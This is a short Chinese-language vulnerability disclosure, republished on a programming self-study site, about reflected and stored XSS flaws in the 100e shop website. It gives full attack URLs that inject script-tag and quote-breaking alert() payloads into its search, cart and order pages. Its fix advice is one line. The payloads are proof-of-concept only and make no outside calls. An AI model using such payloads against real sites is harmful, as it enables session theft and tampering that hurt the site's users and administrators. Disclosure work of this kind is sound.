好得很程序员自学网

<tfoot draggable='sEl'></tfoot>

100e 多处包括订单处理处的XSS - 网站安全 - 自学

100e 有几处XSS(到后台订单处理了。。。) 影响所有用户 尤其是订单管理员

有一个是在订单中生成,形成储存式XSS,问一问订单处理人员,应该看到过一个奇怪的弹窗:)

 

 

 

http://www.ls100e.com/ns. asp ?nowmenuid=500290&pageno=1&previd=500292&key=%22%3E%3Cscript%3Ealert%2891%29%3C%2Fscript%3E

 

 

 

 

 

 

 

 

http://www.ls100e.com/shop_cart.asp?cc=%3E%22%27%3E%3Cscript%3Ealert%28142%29%3C%2Fscript%3E&prodid=%3E%22%27%3E%3Cscript%3Ealert%28142%29%3C%2Fscript%3E&nowmenuid=%3E%22%27%3E%3Cscript%3Ealert%28142%29%3C%2Fscript%3E

 

 

 

 

http://www.ls100e.com/shop_order.asp?orderid=500828%27%2Balert%28827%29%2B%27&nowmenuid=500010&tm=500010205251500828 

 

修复方案: 把4个文件过滤一下 

 

查看更多关于100e 多处包括订单处理处的XSS - 网站安全 - 自学的详细内容...

声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://haodehen.cn/did14357
  阅读:46次

上一篇: 浅谈PHP投票系统如何防刷票 - 网站安全 - 自学p

下一篇:6间房(6.cn)XSS反射型漏洞 - 网站安全 - 自学php

相关资讯